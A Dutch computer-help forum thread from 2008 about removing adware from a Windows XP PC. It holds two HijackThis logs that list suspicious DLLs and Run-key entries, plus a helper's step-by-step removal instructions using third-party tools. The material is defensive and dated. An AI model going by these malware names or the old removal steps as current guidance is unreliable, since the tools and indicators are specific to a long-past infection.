Mededeling

Collapse
No announcement yet.

Popups + trage computer + logje

Collapse
X
  •  
  • Filter
  • Tijd
  • Show
Clear All
new posts

  • Popups + trage computer + logje

    Dag,

    Waarschijnlijk iets van spam gedownload en zit nu met vage popups (IE en Firefox). Tevens computer trager dan normaal. Heb adaware en Spambot Search & Destroy reeds achter de rug. Hier mijn logje...

    Logfile of Trend Micro HijackThis v2.0.0 (BETA)
    Scan saved at 14:30:30, on 23-3-2008
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Windows Defender\MsMpEng.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\Program Files\Norman\Npm\Bin\Zanda.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
    C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
    C:\Program Files\Norman\Nvc\bin\nvcoas.exe
    C:\WINDOWS\System32\alg.exe
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
    C:\Program Files\Windows Defender\MSASCui.exe
    C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
    C:\Program Files\Norman\Npm\bin\ZLH.EXE
    C:\Program Files\Norman\Nvc\BIN\NIP.EXE
    C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
    C:\Program Files\Norman\Nvc\bin\cclaw.exe
    C:\WINDOWS\vsnpstd.exe
    C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
    C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Winamp\winampa.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\WINDOWS\system32\Rundll32.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Skype\Phone\Skype.exe
    C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Messenger\msmsgs.exe
    C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
    C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\acrobat_sl.exe
    C:\Program Files\Google\Google Updater\GoogleUpdater.exe
    C:\Program Files\Skype\Plugin Manager\skypePM.exe
    C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
    C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Internet Explorer\iexplore.exe
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
    C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
    F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: (no name) - {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} - C:\WINDOWS\system32\hgggffg.dll
    O2 - BHO: (no name) - {4E138131-FDFB-42EB-B92D-2BB0975448BB} - C:\WINDOWS\system32\mlljh.dll
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
    O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
    O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
    O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
    O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
    O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
    O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
    O4 - HKLM\..\Run: [snpstd] C:\WINDOWS\vsnpstd.exe
    O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
    O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
    O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
    O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
    O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
    O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
    O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
    O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu2000352.exe 61A847B5BBF72810329B385577FB01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
    O4 - HKLM\..\Run: [b89e5dfb] rundll32.exe "C:\WINDOWS\system32\xuurokys.dll",b
    O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
    O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
    O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
    O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
    O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
    O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
    O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
    O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
    O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
    O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
    O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
    O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
    O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O20 - Winlogon Notify: hgggffg - C:\WINDOWS\SYSTEM32\hgggffg.dll
    O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
    O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
    O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
    O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
    O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
    O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
    O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
    O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
    O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
    O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
    O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
    O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

    --
    End of file - 13721 bytes

  • #2
    Download VirtumundoBegone (mirror)
    Sla dit op op je bureaublad.

    Dubbelklik op VirtumundoBeGone.exe en volg de aanwijzingen.
    Schrik niet als je een blauw scherm met een foutmelding te zien krijgt - dit is normaal.
    Als de fix klaar is, start je de pc opnieuw op.
    Plaats de inhoud van het logbestand VBG.TXT, dat nu op je bureaublad staat, hier in je volgende bericht.


    Download: RVAXO.exe
    • Sla het bestand op je bureaublad op, dubbelklik het en kies voor "Unzip" om het uit te pakken.
    • Start de computer in veilige modus.

      Start HijackThis nog een keer en plaats alleen een vinkje voor de volgende regels:
      O2 - BHO: (no name) - {4E138131-FDFB-42EB-B92D-2BB0975448BB} - C:\WINDOWS\system32\mlljh.dll
      O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu2000352.exe 61A847B5BBF72810329B385577FB01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
      O4 - HKLM\..\Run: [b89e5dfb] rundll32.exe "C:\WINDOWS\system32\xuurokys.dll",b
      O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s

      Sluit alle open vensters(behalve HijackThis), klik daarna op "Fix checked" en sluit HijackThis af.

    • Open nu de map RVAXO op je bureaublad en dubbeklik RunMe.cmd
      Er zal een cmd-schermpje openen, daarin zullen snel enkele regels over niet gevonden bestanden voorbijkomen, dit is normaal.
    • Mogelijk start er ook een uninstaller van een rogue scanner op, sluit deze niet af maar volg eventuele aanwijzingen en laat deze gewoon zijn werk doen.
    • Daarna zal je PC herstarten, laat hem nu weer in normale modus starten. Na de herstart opent het cmd-venster van RVAXO opnieuw.
      Laat deze lopen en wacht tot er een logfile opent: C:\RVAXO-results.log
    • Herstart je computer niet vanzelf, of start de tool niet na de reboot, doe dit dan handmatig.
    • Post de inhoud van de logfile in je volgende bericht.

    Post ook een nieuw logje van Hijackthis

    Comment


    • #3
      Hijackthislog:
      Logfile of Trend Micro HijackThis v2.0.0 (BETA)
      Scan saved at 15:47:48, on 23-3-2008
      Platform: Windows XP SP2 (WinNT 5.01.2600)
      Boot mode: Normal

      Running processes:
      C:\WINDOWS\System32\smss.exe
      C:\WINDOWS\system32\csrss.exe
      C:\WINDOWS\system32\winlogon.exe
      C:\WINDOWS\system32\services.exe
      C:\WINDOWS\system32\lsass.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\svchost.exe
      C:\Program Files\Windows Defender\MsMpEng.exe
      C:\WINDOWS\System32\svchost.exe
      C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
      C:\Program Files\Norman\Npm\Bin\Zanda.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\spoolsv.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
      C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
      C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
      C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
      C:\WINDOWS\system32\svchost.exe
      C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
      C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
      C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
      C:\Program Files\Norman\Nvc\bin\nvcoas.exe
      C:\WINDOWS\System32\alg.exe
      C:\WINDOWS\Explorer.EXE
      C:\WINDOWS\RTHDCPL.EXE
      C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
      C:\Program Files\Windows Defender\MSASCui.exe
      C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
      C:\Program Files\Norman\Npm\bin\ZLH.EXE
      C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
      C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
      C:\Program Files\Norman\Nvc\BIN\NIP.EXE
      C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
      C:\Program Files\Norman\Nvc\bin\cclaw.exe
      C:\Program Files\iTunes\iTunesHelper.exe
      C:\Program Files\Winamp\winampa.exe
      C:\WINDOWS\system32\ctfmon.exe
      C:\Program Files\Skype\Phone\Skype.exe
      C:\Program Files\iPod\bin\iPodService.exe
      C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
      C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
      C:\Program Files\Messenger\msmsgs.exe
      C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
      C:\Program Files\Google\Google Updater\GoogleUpdater.exe
      C:\Program Files\Skype\Plugin Manager\skypePM.exe
      C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
      C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
      C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
      C:\Program Files\Mozilla Firefox\firefox.exe
      C:\Program Files\Internet Explorer\iexplore.exe
      C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe
      C:\WINDOWS\system32\wbem\wmiprvse.exe

      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
      F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
      O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
      O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
      O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
      O2 - BHO: (no name) - {907482A4-6676-415C-AFBD-0564A8A2810A} - C:\WINDOWS\system32\mlljh.dll
      O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
      O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
      O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
      O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
      O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
      O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
      O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
      O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
      O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
      O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
      O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
      O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
      O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
      O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
      O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
      O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
      O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
      O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
      O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
      O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
      O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
      O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
      O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
      O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
      O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
      O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
      O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
      O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
      O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
      O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
      O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
      O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
      O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
      O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
      O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
      O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
      O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
      O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
      O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
      O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
      O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
      O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
      O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
      O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
